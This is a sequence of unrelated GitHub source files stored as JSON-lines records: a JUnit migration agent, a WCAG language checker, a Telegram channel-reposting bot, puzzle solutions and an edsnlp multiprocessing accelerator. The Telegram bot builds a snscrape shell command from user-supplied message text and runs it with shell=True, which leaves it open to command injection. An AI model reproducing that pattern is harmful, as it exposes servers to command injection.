'_' in variable_name:\n method_name = ''.join([x.capitalize() for x in variable_name.split('_')])\n\n return_type = field.type.name.value\n method = 'public %s get%s() {\\n return mTestCommon.%s;\\n }' % (\n return_type, method_name, variable_name)\n assert isinstance(field, model.FieldDeclaration)\n first_method = self.main_element_table[model.MethodDeclaration][0]\n self._insertAbove(first_method, method)\n except Exception:\n self.logger.warn('Failed to create getter for %s', field)\n\n def removeAndReturnStaticFields(self):\n field_list = self.main_element_table.get(model.FieldDeclaration, [])\n (static_accessible, static_inaccessible, member_accessible,\n member_inaccessible) = ([], [], [], [])\n for i in field_list:\n if 'public' in i.modifiers or 'protected' in i.modifiers:\n self.createGetter(i)\n if 'static' in i.modifiers:\n static_accessible.append(self._removeElement(i))\n else:\n member_accessible.append(self._removeElement(i))\n else:\n if 'static' in i.modifiers:\n static_inaccessible.append(self._removeElement(i))\n else:\n member_inaccessible.append(self._removeElement(i))\n return (member_accessible, member_inaccessible, static_accessible,\n static_inaccessible)\n\n def _methodUnderBlock(self, m):\n block_range = []\n for b in self.main_element_table[model.Block]:\n block_range.append((b.lexpos, b.lexend))\n for r in block_range:\n if m.lexpos > r[0] and m.lexend < r[1]:\n return True\n return super.skip()\n\n def getMethods(self):\n accessible, inaccessible = [], []\n for m in self.actionOnMethodDeclaration(\n condition=lambda x:'\\n' == self.content[self._lexposToLoc(x.lexpos-5)]):\n if 'public' in m.modifiers or 'protected' in m.modifiers:\n accessible.append(m)\n else:\n inaccessible.append(m)\n return accessible, inaccessible\n\n def removeElements(self, elements):\n for i in elements:\n self._removeElement(i)\n\n def getElementContent(self, elements):\n content = []\n for m in elements:\n content.append(self._object_to_string(m))\n return content\n\n def CommonizeAndRemoveMethods(self, methods):\n for m in methods:\n arg = '()'\n if m.parameters:\n arg = '(%s)' % ', '.join([p.variable.name for p in m.parameters])\n self._replaceString(\n r'(.*?) 
{.*}',\n r'\\1 {\\n mTestCommon.%s%s;\\n }' % (m.name, arg),\n element=m, flags=re.DOTALL)\n\n def actions(self):\n self.changeAssertions()\n self.SaveAndReload()\n package = self.getPackage()\n\n # Get dirname and file names for test common and test rule\n dirname = '/'.join(self._filepath.split('/')[:-1])\n filename = self._filepath.split('/')[-1]\n prefix = re.match(r'(.*)Test.*\\.java', filename).group(1)\n test_common_class_name = prefix+'TestCommon'\n test_common_callback_class_name = test_common_class_name+'Callback'\n test_rule_class_name = prefix+'TestRule'\n\n self.implementsTestCommonCallback(test_common_class_name)\n\n (_, inaccessible_member_fields, accessible_static_fields,\n inaccessible_static_fields) = self.removeAndReturnStaticFields()\n\n accessible_methods, inaccessible_methods = self.getMethods()\n accessible_methods_content_list = self.getElementContent(accessible_methods)\n inaccessible_method_content_list = self.getElementContent(\n inaccessible_methods)\n class_list = self.actionOnX(model.ClassDeclaration, main_table=False,\n condition=lambda x: not x == self.main_class)\n class_content_list = self.getElementContent(class_list)\n self.removeElements(inaccessible_methods)\n self.removeElements(class_list)\n\n self.CommonizeAndRemoveMethods(accessible_methods)\n self.SaveAndReload()\n commonized_methods, _ = self.getMethods()\n\n imports = self.actionOnX(model.ImportDeclaration, main_table=False)\n\n test_common_dict = {\n 'classname': test_common_class_name,\n 'package': package,\n 'imports': self._all_objects_to_string_list(imports),\n 'classes': class_content_list,\n 'fields': inaccessible_static_fields+inaccessible_member_fields,\n 'methods': inaccessible_method_content_list\\\n + accessible_methods_content_list,\n 'common_callback': test_common_callback_class_name,\n }\n\n test_rule_dict = {\n 'classname': test_rule_class_name,\n 'package': package,\n 'imports': self._all_objects_to_string_list(imports),\n 'fields': accessible_static_fields,\n 'methods': self._all_objects_to_string_list(commonized_methods),\n 'testcommon': test_common_class_name,\n 'common_callback': test_common_callback_class_name,\n }\n\n self.generateClass(_TEST_COMMON_JINJA_TEMPLATE, test_common_dict,\n os.path.join(dirname, test_common_class_name+'.java'))\n self.generateClass(_TEST_RULE_JINJA_TEMPLATE, test_rule_dict,\n os.path.join(dirname, test_rule_class_name+'.java'))\n test_rule_agent = base_agent.BaseAgent(\n self.parser, os.path.join(dirname, test_rule_class_name+'.java'))\n test_rule_agent.actionOnMethodDeclaration(\n action=lambda x: test_rule_agent._replaceString(\n 'protected', 'public', element=x))\n self.Save()\n test_rule_agent.Save()\n\n def generateClass(self, template_string, data, filepath):\n with codecs.open(filepath, encoding='utf-8', mode='w') as f:\n f.write(jinja2.Template(template_string).render(data))\n\n def skip(self):\n return False\n\n\n\n","repo_name":"yoland68/chromium-junit-auto-migrate","sub_path":"src/test_base_convert_agent.py","file_name":"test_base_convert_agent.py","file_ext":"py","file_size_in_byte":8537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13156822275","text":"from functools import wraps\nimport stack.repo\n\ndef rewrite_frontend_repo_file(command_run_method):\n\t@wraps(command_run_method)\n\tdef wrapper(*args, **kwargs):\n\t\tcommand_obj = args[0]\n\t\toriginal_box_data = command_obj.call('list.box', [command_obj.db.getHostBox('localhost')])\n\t\tcommand_run_method(*args, 
**kwargs)\n\t\tnew_box_data = command_obj.call('list.box', [command_obj.db.getHostBox('localhost')])\n\t\tif original_box_data != new_box_data:\n\t\t\tcommand_obj.deferred.callback(stack.repo.rewrite_repofile)\n\treturn wrapper\n","repo_name":"Teradata/stacki","sub_path":"common/src/stack/command/stack/deferable/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"99"} +{"seq_id":"13131471717","text":"\"\"\"Detect infractions against WCAG 3.1.2.\"\"\"\n\nfrom typing import List, Optional, Tuple\n\nfrom lxml.etree import _ElementTree\nfrom lxml.html import HtmlElement\n\nfrom ..models import LanguageInfraction\nfrom .utils_3_1 import count_words, predict_language\n\nMIN_WORDS_DEFAULT = 4\nMIN_WORDS_HIDDEN = 2\nHIDDEN_ATTRIBUTES = {\"aria-label\", \"alt\", \"value\", \"title\"}\n\n\ndef detect_wcag_3_1_2_infractions(\n body_html: HtmlElement, html_language: str\n) -> List[LanguageInfraction]:\n \"\"\"Detect WCAG 3.1.2 infractions in the given web page.\n\n Parameters\n ----------\n body_html : HtmlElement\n The body of the web page\n html_language : str\n The page's defined language\n\n Returns\n -------\n List[LanguageInfraction]\n The detected infractions against WCAG 3.1.2\n \"\"\"\n # Obtain the infractions recursively\n tree = body_html.getroottree()\n _, _, _, infractions = _dfs(tree, body_html, html_language, [])\n\n return infractions\n\n\ndef _dfs(\n tree: _ElementTree,\n element: HtmlElement,\n parent_language: str,\n infractions: List[LanguageInfraction],\n) -> Tuple[str, Optional[str], Optional[str], List[LanguageInfraction]]:\n \"\"\"Check for infractions against WCAG 3.1.2 using a recursive DFS.\n\n Parameters\n ----------\n tree : _ElementTree\n The root element tree of the web page, used to calculate the xpath\n element : HtmlElement\n The current element to check for infractions\n parent_language : str\n The defined language of the current element's parent\n infractions : List[LanguageInfraction]\n The infractions found until now\n\n Returns\n -------\n Tuple[str, Optional[str], Optional[str], List[LanguageInfraction]]\n A tuple containing:\n - the explicitly defined language of the current element\n - the detected language of the current element\n - the text of the current element\n - the infractions found\n \"\"\"\n # If the current element does not have a `lang` attribute, take the parent's language\n defined_language = element.get(\"lang\", parent_language).lower()[:2]\n\n # The text contained in this element (and in this element alone)\n text = (element.text or \"\").replace(\"\\n\", \" \").strip()\n\n # Check for infractions against WCAG 3.1.2 in hidden attributes\n hidden_infraction = _check_hidden_attributes(tree, element, defined_language)\n if hidden_infraction is not None:\n infractions.append(hidden_infraction)\n\n # Check for infractions against WCAG 3.1.2 in the current element's children\n children = element.getchildren()\n if children:\n # Run this function on each of the children (= recursion)\n children_results = [_dfs(tree, child, defined_language, infractions) for child in children]\n\n # Differ between children that are similar and children that are different\n if len({(defined, detected) for defined, detected, _, _ in children_results}) == 1:\n # All children have the same language defined and detected\n child_defined_language, child_detected_language, _, _ = children_results[0]\n children_text = \" \".join(str(child_result[2]) for 
child_result in children_results)\n if child_detected_language and child_defined_language != child_detected_language:\n # All children are wrong\n # Give a warning for the current element instead of for each of its children\n infractions.append(\n LanguageInfraction(\n wcag_criterion=\"WCAG_3_1_2\",\n xpath=tree.getpath(element),\n html_language=child_defined_language,\n predicted_language=child_detected_language,\n text=children_text,\n )\n )\n else:\n # The children have different values for their defined and detected languages\n for child, child_result in zip(children, children_results):\n child_defined_language, child_detected_language, child_text, _ = child_result\n if child_detected_language and child_detected_language != child_defined_language:\n # This child is wrong, give a warning for only this child\n infractions.append(\n LanguageInfraction(\n wcag_criterion=\"WCAG_3_1_2\",\n xpath=tree.getpath(child),\n html_language=child_defined_language,\n predicted_language=child_detected_language,\n text=str(child_text),\n )\n )\n\n # If any of the children of the current element contains a very short piece of text, add it\n # to the current element's text\n for _, _, child_text, _ in children_results:\n if child_text is None:\n continue\n child_text = child_text.strip()\n\n # We only add the child text if it is short\n if count_words(child_text) >= MIN_WORDS_DEFAULT:\n continue\n current_text = (text or \"\").strip()\n\n # We only add the child text if the current text doesn't end with the child text\n if not current_text.endswith(child_text):\n text = current_text + \" \" + child_text\n\n # If the current element's text is long enough, predict its language\n if count_words(text) >= MIN_WORDS_DEFAULT:\n detected_language = predict_language(text)\n else:\n detected_language = None\n\n return defined_language, detected_language, text, infractions\n\n\ndef _check_hidden_attributes(\n tree: _ElementTree, element: HtmlElement, defined_language: str\n) -> Optional[LanguageInfraction]:\n \"\"\"Check for an infraction in the hidden attributes of an element.\n\n Parameters\n ----------\n tree : _ElementTree\n The root element tree of the web page, used to calculate the xpath\n element : HtmlElement\n The current element to check for an infraction\n defined_language : str\n The defined language of the current element\n\n Returns\n -------\n Optional[LanguageInfraction]\n Either an infraction against WCAG 3.1.2 or `None`\n \"\"\"\n for attribute_name in HIDDEN_ATTRIBUTES:\n if attribute_name in element.attrib:\n attribute_value = element.attrib[attribute_name].strip()\n if count_words(attribute_value) < MIN_WORDS_HIDDEN:\n # If the hidden attribute's value is too short, we don't check its language\n continue\n detected_language = predict_language(attribute_value)\n if detected_language and defined_language != detected_language:\n # The hidden attribute is wrong, return an infraction\n return LanguageInfraction(\n wcag_criterion=\"WCAG_3_1_2\",\n xpath=tree.getpath(element),\n html_language=defined_language,\n predicted_language=detected_language,\n text=attribute_value,\n )\n return None\n","repo_name":"radix-ai/fod-bosa-accessibility-check-backend","sub_path":"src/accessibility_check_backend/wcag/wcag_3_1_2.py","file_name":"wcag_3_1_2.py","file_ext":"py","file_size_in_byte":7187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"11228468806","text":"def solution(n, arr1, arr2):\n arr1_0b = []\n arr2_0b = []\n for i in arr1:\n 
arr1_0b.append(bin(i)[2:].zfill(n))\n for i in arr2:\n arr2_0b.append(bin(i)[2:].zfill(n))\n \n answer = []\n for i1, i2 in zip(arr1_0b, arr2_0b):\n string = \"\"\n for x, y in zip(i1, i2):\n if x == '1' or y == '1':\n string += \"#\"\n else:\n string += \" \"\n answer.append(string) \n \n return answer","repo_name":"tmkimm/Algorithm","sub_path":"programmers/비밀지도.py","file_name":"비밀지도.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"5575735087","text":"import telebot \nimport json \nimport subprocess\n\nTOKEN = \".................\"\nbot = telebot.TeleBot(TOKEN)\n\ndef collect_posts(channel):\n with open(f\"{channel}.txt\") as file:\n file = file.readlines()\n posts = []\n for n, line in enumerate(file):\n file[n] = json.loads(file[n])\n links = [link for link in file[n]['outlinks'] if channel not in link]\n p = str(file[n]['content']) + \"\\n\\n\" + str(\"\\n\".join(links))\n posts.append(p)\n return posts \n\n\ndef upload_posts(num_posts, channel):\n command = f'snscrape --max-result {num_posts} --jsonl telegram-channel {channel} > {channel}.txt'\n subprocess.run(command, shell=True)\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n bot.reply_to(message, \"Напиши:\\n1. название канала, откуда выгрузить\\n2. сколько последних постов выгрузить\\n3. куда выгрузить\\n\\nПример ввода:\\n `other_channel 10 my_channel` \") \n\n\n@bot.message_handler(content_types=[\"text\"])\ndef send_welcome(message):\n try:\n channel, num_posts, target_channel = str(message.text).split()\n target_channel = \"@\"+target_channel\n \n upload_posts(num_posts, channel)\n posts = collect_posts(channel)\n while posts:\n bot.send_message(target_channel, posts.pop())\n \n bot.reply_to(message, \"Отлично, пересылка завершена\")\n\n except:\n bot.reply_to(message, \"Неправильный формат. Нажми /start, чтобы увидеть правильный формат ввода\")\n\n\nif __name__ == \"__main__\":\n bot.polling() \n","repo_name":"Develp10/chatgpttelegram","sub_path":"0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"32708430849","text":"'''\r\nCreated on 30 nov. 
2016\r\n\r\n@author: Manuel\r\n'''\r\ndef crear_lista(lista):\r\n '''\r\n Funcion para crear una lista con 5 variables a partir de una lista vacia que utilizaremos posteriormente.\r\n Por favor, introduzca solo 5 variables porque sino lo demas no funciona.\r\n '''\r\n objeto=input(\"Introduzca un elemento a la cadena:\")\r\n lista.append(objeto)\r\n pregunta=input(\"Quieres meter mas elementos?\") #Introduzca si o no\r\n while pregunta==\"Si\" or pregunta==\"si\":\r\n elemento=input(\"Introduzca otro elemento:\")\r\n lista.append(elemento)\r\n print(lista)\r\n pregunta=input(\"Quieres meter mas elementos?\")\r\n return lista\r\ndef dividir_lista(lista):\r\n ''' \r\n A continuacion vamos a dividir la lista en pacientes, fase en la que se encuentra y temperaturas.\r\n '''\r\n id_paciente=lista[0]\r\n fase=lista[1]\r\n temperaturas=lista[2:]\r\n return id_paciente,fase,temperaturas\r\ndef anadir_temperatura(temperaturas1):\r\n '''\r\n Esta funcion se utiliza para anadir una temperatura a la lista de temperaturas.\r\n '''\r\n elemento6=float(input(\"Introduce un valor nuevo de temperaturas:\"))\r\n temperaturas1.append(elemento6)\r\n return temperaturas1\r\ndef flotante(temperaturafinal):\r\n '''\r\n Esta funcion se utiliza para cambiar las temperaturas a flotantes.\r\n '''\r\n temperaturafinal[0]=float(temperaturafinal[0])\r\n temperaturafinal[1]=float(temperaturafinal[1])\r\n temperaturafinal[2]=float(temperaturafinal[2])\r\n return temperaturafinal\r\ndef lista_temp2(temperaturafinalfloat):\r\n '''\r\n Esta funcion crea una lista de temperaturas para anadirla despues a las temperaturas.\r\n '''\r\n tmp=[]\r\n pregunta=input(\"Quiere crear una lista nueva de temperaturas para anadirla a la anterior?\") #Introduzca si o no\r\n while pregunta==\"Si\" or pregunta==\"si\":\r\n elemento=float(input(\"Introduzca otro elemento:\"))\r\n tmp.append(elemento)\r\n pregunta=input(\"Quieres meter mas elementos?\")\r\n return tmp \r\ndef temperaturas_finales(temperaturafinalfloat):\r\n '''\r\n Esta funcion anade la lista tmp a las temperaturas.\r\n '''\r\n temperaturafinalfloat.append(tmp)\r\n return temperaturafinalfloat\r\ndef contar_elementos(lastemperaturas):\r\n '''\r\n Esta funcion cuenta los elementos en temperaturas.\r\n '''\r\n l=len(tmp)+len(temperaturafinalfloat)\r\n bueno=l-1\r\n return bueno\r\ndef cadena_texto(lastemperaturas):\r\n '''\r\n Esta funcion pasa las temperaturas a cadena de texto.\r\n '''\r\n for x in range(len(lastemperaturas)):\r\n lastemperaturas[x]=str(lastemperaturas[x])\r\n elemento=lastemperaturas[0]\r\n for x in range(len(lastemperaturas)):\r\n elemento=elemento+\", \"+lastemperaturas[x]\r\n temperaturas_cadena=elemento\r\n return temperaturas_cadena\r\nif __name__==\"__main__\":\r\n lista=[]\r\n print(crear_lista(lista))\r\n id_paciente,fase,temperaturas1=dividir_lista(lista)\r\n temperaturafinal=anadir_temperatura(temperaturas1)\r\n temperaturafinalfloat=flotante(temperaturafinal)\r\n tmp=lista_temp2(temperaturafinalfloat)\r\n lastemperaturas=temperaturas_finales(temperaturafinalfloat)\r\n elementos_temperaturas=contar_elementos(temperaturafinalfloat)\r\n temperaturastexto=cadena_texto(lastemperaturas)\r\n\r\n ","repo_name":"manolosierra99/EJERCICIOS_LISTAS","sub_path":"Ejercicios_Listas/Funciones_listas/Funcion_lista.py","file_name":"Funcion_lista.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13689896821","text":"subtotal = input(\"What is the order amount? 
\")\nprint(subtotal)\nsubtotal = float(subtotal)\n\nf_subtotal = '{:20,.2f}'.format(subtotal)\nf_subtotal = str(f_subtotal)\nprint(\"subtotal: \" + f_subtotal)\nstate = raw_input(\"What is the state? \")\nif (state == \"MD\"):\n print(\"subtotal: \" + f_subtotal)\n taxrate = float(0.06)\n tax = taxrate * subtotal\n tax = float(tax)\n f_tax = ('{:20,.2f}'.format(tax))\n f_tax = str(f_tax)\n print(\"Sales Tax: \" + f_tax)\n total = tax + subtotal\n f_Total = ('{:20,.2f}'.format(total))\n f_Total = str(f_Total)\n print(\"Total: \" + f_Total)\nelse:\n print(\"Don't know where that is.\")\n","repo_name":"Ocho262/Python_Challenges_2","sub_path":"tax_calculator.py","file_name":"tax_calculator.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34140845082","text":"\"\"\"\n94% solution that works by finding leafs with negative profit and cutting them off. The process of\npruning leafs is repeated until no more leafs can be removed. It currently falls short of AC(100)\nbecause individual nodes only know about their direct dependants, and they'd need to know about\n*all* dependants to accuratly calculate their own profit. Naïvely implementing this resulted in a \nrunning time greater than the one second limit imposed by the challenge.\n\"\"\"\n\nimport sys\nimport abc\nfrom collections import deque\nfrom functools import reduce\nfrom typing import Set, Optional\n\n\nclass Element(abc.ABC):\n __slots__ = \"excavated\", \"x\", \"y\"\n\n excavated: bool\n x: int\n y: int\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.excavated = False\n\n @abc.abstractmethod\n def text():\n return\n\n @abc.abstractmethod\n def excavate():\n return\n\n\nclass Dirt(Element):\n def text(self):\n return \" \" if self.excavated else \"#\"\n\n def excavate(self):\n self.excavated = True\n\n\nclass Mink(Element):\n __slots__ = \"calls\", \"filler\", \"dependencies\", \"dependants\", \"d\", \"_cost\"\n\n chars = \"<\", \"=\", \">\"\n calls: int\n d: int\n _cost: Optional[int]\n filler: Set[Dirt]\n dependencies: Set[\"Mink\"]\n dependants: Set[\"Mink\"]\n\n def __init__(self, x, y, d):\n super().__init__(x, y)\n self.d = d\n self._cost = None\n self.calls = -1\n self.filler = set()\n self.dependencies = set()\n self.dependants = set()\n\n def text(self):\n if self.excavated:\n return \" \"\n self.calls += 1\n return self.chars[self.calls % len(self.chars)]\n\n def excavate(self):\n self.excavated = True\n for dirt in self.filler:\n dirt.excavate()\n\n def cost(self):\n if self._cost is None:\n self._cost = (\n len(self.filler)\n + reduce(lambda a, m: a + m.cost(), self.dependants, 0)\n - self.d\n )\n return self._cost\n\n def expand(self):\n yield self\n for dependant in self.dependants:\n yield from dependant.expand()\n\n def remove(self, ms):\n self._cost = None\n if not self.dependants.isdisjoint(ms):\n self.dependants -= ms\n\n def __eq__(self, other):\n return isinstance(other, self.__class__) and hash(self) == hash(other)\n\n def __hash__(self):\n return (self.x << 16) + self.y\n\n def __repr__(self):\n return f\"Mink({self.x}, {self.y}, cost={self.cost()})\"\n\n\nclass Cluster:\n __slots__ = \"mink\", \"cost\"\n\n mink: Set[Mink]\n cost: int\n\n def __init__(self, mink: Set[Mink]):\n self.mink = mink\n self.cost = reduce(lambda a, m: a + len(m.filler) - m.d, self.mink, 0)\n\n def excavatable(self):\n return self.cost < 0\n\n def shrink(self):\n yield from self.eliminate(\n set(\n d\n for m in filter(\n 
lambda m: not any(map(lambda d: d.cost() >= 0, m.dependants))\n and m.cost() >= 0,\n self.mink,\n )\n for d in m.expand()\n )\n )\n\n def eliminate(self, ms):\n mink = self.mink - ms\n for m in mink:\n m.remove(ms)\n yield from make_clusters(mink)\n\n def excavate(self):\n for m in self.mink:\n m.excavate()\n\n def __repr__(self):\n return f\"Cluster({self.mink})\"\n\n def __eq__(self, other):\n return isinstance(other, self.__class__) and self.mink == other.mink\n\n\ndef read_ground():\n h, b, d = map(int, sys.stdin.readline().split())\n mink = set()\n ground = []\n for y in range(h):\n ground.append([])\n for x in range(b):\n read = sys.stdin.read(1)\n if read == \"#\":\n ground[y].append(Dirt(x, y))\n elif read == \"<\":\n m = Mink(x, y, d)\n ground[y].append(m)\n mink.add(m)\n else:\n ground[y].append(ground[y][x - 1])\n sys.stdin.read(1)\n return ground, mink\n\n\ndef set_dependencies(ground, mink):\n for m in mink:\n for offset in range(3):\n for y in range(m.y - 1, -1, -1):\n here = ground[y][m.x + offset]\n if isinstance(here, Mink):\n here.dependants.add(m)\n m.dependencies.add(here)\n break\n else:\n m.filler.add(here)\n\n\ndef make_clusters(mink):\n seen = set()\n\n def connected(m):\n if m not in seen:\n seen.add(m)\n for other in m.dependencies | m.dependants:\n yield from connected(other)\n yield m\n\n for m in mink:\n if m not in seen:\n yield Cluster(set(connected(m)))\n\n\nground, mink = read_ground()\nset_dependencies(ground, mink)\nqueue = deque(make_clusters(mink))\n\nwhile len(queue) != 0:\n cluster = queue.popleft()\n for nc in cluster.shrink():\n if nc == cluster:\n if nc.excavatable():\n nc.excavate()\n else:\n queue.append(nc)\n\nprint(\"\\n\".join(\"\".join(el.text() for el in row) for row in ground))\n","repo_name":"JonasUJ/hoest21","sub_path":"T-itu.mink/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"70859905606","text":"import gc\nimport signal\nfrom multiprocessing.connection import wait\nfrom random import shuffle\nfrom typing import Any, Iterable, List, Optional, Union\n\nimport torch\nimport torch.multiprocessing as mp\n\nfrom .. 
import TrainablePipe\nfrom ..registry import registry\nfrom ..utils.collections import batchify\nfrom .base import Accelerator, FromDictFieldsToDoc, FromDoc, ToDoc\n\nDEBUG = False\n\ndebug = (\n (lambda *args, flush=False, **kwargs: print(*args, **kwargs, flush=True))\n if DEBUG\n else lambda *args, **kwargs: None\n)\n\n\nclass Exchanger:\n def __init__(\n self,\n num_stages,\n num_gpu_workers,\n num_cpu_workers,\n gpu_worker_devices,\n ):\n # queue for cpu input tasks\n self.gpu_worker_devices = gpu_worker_devices\n # We add prioritized queue at the end for STOP signals\n self.cpu_inputs_queues = [\n [mp.SimpleQueue()] + [mp.SimpleQueue() for _ in range(num_stages + 1)]\n # The input queue is not shared between processes, since calling `wait`\n # on a queue reader from multiple processes may lead to a deadlock\n for _ in range(num_cpu_workers)\n ]\n self.gpu_inputs_queues = [\n [mp.SimpleQueue() for _ in range(num_stages + 1)]\n for _ in range(num_gpu_workers)\n ]\n self.outputs_queue = mp.Queue()\n\n def get_cpu_tasks(self, idx):\n while True:\n queue_readers = wait(\n [queue._reader for queue in self.cpu_inputs_queues[idx]]\n )\n stage, queue = next(\n (stage, q)\n for stage, q in reversed(list(enumerate(self.cpu_inputs_queues[idx])))\n if q._reader in queue_readers\n )\n try:\n item = queue.get()\n except BaseException:\n continue\n if item is None:\n return\n yield stage, item\n\n def put_cpu(self, item, stage, idx):\n return self.cpu_inputs_queues[idx][stage].put(item)\n\n def get_gpu_tasks(self, idx):\n while True:\n queue_readers = wait(\n [queue._reader for queue in self.gpu_inputs_queues[idx]]\n )\n stage, queue = next(\n (stage, q)\n for stage, q in reversed(list(enumerate(self.gpu_inputs_queues[idx])))\n if q._reader in queue_readers\n )\n try:\n item = queue.get()\n except BaseException: # pragma: no cover\n continue\n if item is None:\n return\n yield stage, item\n\n def put_gpu(self, item, stage, idx):\n return self.gpu_inputs_queues[idx][stage].put(item)\n\n def put_results(self, items):\n self.outputs_queue.put(items)\n\n def iter_results(self):\n for out in iter(self.outputs_queue.get, None):\n yield out\n\n\nclass CPUWorker(mp.Process):\n def __init__(\n self,\n cpu_idx: int,\n exchanger: Exchanger,\n gpu_pipe_names: List[str],\n model: Any,\n device: Union[str, torch.device],\n ):\n super(CPUWorker, self).__init__()\n\n self.cpu_idx = cpu_idx\n self.exchanger = exchanger\n self.gpu_pipe_names = gpu_pipe_names\n self.model = model\n self.device = device\n\n def _run(self):\n # Cannot pass torch tensor during init i think ? 
otherwise i get\n # ValueError: bad value(s) in fds_to_keep\n mp._prctl_pr_set_pdeathsig(signal.SIGINT)\n\n model = self.model.to(self.device)\n stages = [{\"cpu_components\": [], \"gpu_component\": None}]\n for name, component in model.pipeline:\n if name in self.gpu_pipe_names:\n stages[-1][\"gpu_component\"] = component\n stages.append({\"cpu_components\": [], \"gpu_component\": None})\n else:\n stages[-1][\"cpu_components\"].append(component)\n\n next_batch_id = 0\n active_batches = {}\n debug(\n f\"CPU worker {self.cpu_idx} is ready\",\n next(model.parameters()).device,\n flush=True,\n )\n\n had_error = False\n with torch.no_grad():\n for stage, task in self.exchanger.get_cpu_tasks(self.cpu_idx):\n if had_error:\n continue # pragma: no cover\n try:\n if stage == 0:\n gpu_idx = None\n batch_id = next_batch_id\n debug(\"preprocess start for\", batch_id)\n next_batch_id += 1\n docs = task\n else:\n gpu_idx, batch_id, result = task\n debug(\"postprocess start for\", batch_id)\n docs = active_batches.pop(batch_id)\n gpu_pipe = stages[stage - 1][\"gpu_component\"]\n docs = gpu_pipe.postprocess(docs, result) # type: ignore\n\n for component in stages[stage][\"cpu_components\"]:\n if hasattr(component, \"batch_process\"):\n docs = component.batch_process(docs)\n else:\n docs = [component(doc) for doc in docs]\n\n gpu_pipe = stages[stage][\"gpu_component\"]\n if gpu_pipe is not None:\n preprocessed = gpu_pipe.make_batch(docs) # type: ignore\n active_batches[batch_id] = docs\n if gpu_idx is None:\n gpu_idx = batch_id % len(self.exchanger.gpu_worker_devices)\n collated = gpu_pipe.collate( # type: ignore\n preprocessed,\n device=self.exchanger.gpu_worker_devices[gpu_idx],\n )\n self.exchanger.put_gpu(\n item=(self.cpu_idx, batch_id, collated),\n idx=gpu_idx,\n stage=stage,\n )\n batch_id += 1\n debug(\"preprocess end for\", batch_id)\n else:\n self.exchanger.put_results((docs, self.cpu_idx, gpu_idx))\n debug(\"postprocess end for\", batch_id)\n except BaseException as e:\n had_error = True\n import traceback\n\n print(traceback.format_exc(), flush=True)\n self.exchanger.put_results((e, self.cpu_idx, None))\n # We need to drain the queues of GPUWorker fed inputs (pre-moved to GPU)\n # to ensure no tensor allocated on producer processes (CPUWorker via\n # collate) are left in consumer processes\n debug(\"Start draining CPU worker\", self.cpu_idx)\n [None for _ in self.exchanger.get_cpu_tasks(self.cpu_idx)]\n debug(f\"CPU worker {self.cpu_idx} is about to stop\")\n\n def run(self):\n self._run()\n self.model = None\n gc.collect()\n torch.cuda.empty_cache()\n\n\nclass GPUWorker(mp.Process):\n def __init__(\n self,\n gpu_idx,\n exchanger: Exchanger,\n gpu_pipe_names: List[str],\n model: Any,\n device: Union[str, torch.device],\n ):\n super().__init__()\n\n self.device = device\n self.gpu_idx = gpu_idx\n self.exchanger = exchanger\n\n self.gpu_pipe_names = gpu_pipe_names\n self.model = model\n self.device = device\n\n def _run(self):\n debug(\"GPU worker\", self.gpu_idx, \"started\")\n mp._prctl_pr_set_pdeathsig(signal.SIGINT)\n had_error = False\n\n model = self.model.to(self.device)\n stage_components = [model.get_pipe(name) for name in self.gpu_pipe_names]\n del model\n with torch.no_grad():\n for stage, task in self.exchanger.get_gpu_tasks(self.gpu_idx):\n if had_error:\n continue # pragma: no cover\n try:\n cpu_idx, batch_id, batch = task\n debug(\"forward start for\", batch_id)\n component = stage_components[stage]\n res = component.module_forward(batch)\n del batch, task\n # TODO set 
non_blocking=True here\n res = {\n key: val.to(\"cpu\") if not isinstance(val, int) else val\n for key, val in res.items()\n }\n self.exchanger.put_cpu(\n item=(self.gpu_idx, batch_id, res),\n stage=stage + 1,\n idx=cpu_idx,\n )\n debug(\"forward end for\", batch_id)\n except BaseException as e:\n had_error = True\n self.exchanger.put_results((e, None, self.gpu_idx))\n import traceback\n\n print(traceback.format_exc(), flush=True)\n task = batch = res = None # noqa\n # We need to drain the queues of CPUWorker fed inputs (pre-moved to GPU)\n # to ensure no tensor allocated on producer processes (CPUWorker via\n # collate) are left in consumer processes\n debug(\"Start draining GPU worker\", self.gpu_idx)\n [None for _ in self.exchanger.get_gpu_tasks(self.gpu_idx)]\n debug(f\"GPU worker {self.gpu_idx} is about to stop\")\n\n def run(self):\n self._run()\n self.model = None\n gc.collect()\n torch.cuda.empty_cache()\n\n\nDEFAULT_MAX_CPU_WORKERS = 4\n\n\n@registry.accelerator.register(\"multiprocessing\")\nclass MultiprocessingAccelerator(Accelerator):\n \"\"\"\n If you have multiple CPU cores, and optionally multiple GPUs, we provide a\n `multiprocessing` accelerator that allows to run the inference on multiple\n processes.\n\n This accelerator dispatches the batches between multiple workers\n (data-parallelism), and distribute the computation of a given batch on one or two\n workers (model-parallelism). This is done by creating two types of workers:\n\n - a `CPUWorker` which handles the non deep-learning components and the\n preprocessing, collating and postprocessing of deep-learning components\n - a `GPUWorker` which handles the forward call of the deep-learning components\n\n The advantage of dedicating a worker to the deep-learning components is that it\n allows to prepare multiple batches in parallel in multiple `CPUWorker`, and ensure\n that the `GPUWorker` never wait for a batch to be ready.\n\n The overall architecture described in the following figure, for 3 CPU workers and 2\n GPU workers.\n\n
\n\n Here is how a small pipeline with rule-based components and deep-learning components\n is distributed between the workers:\n\n
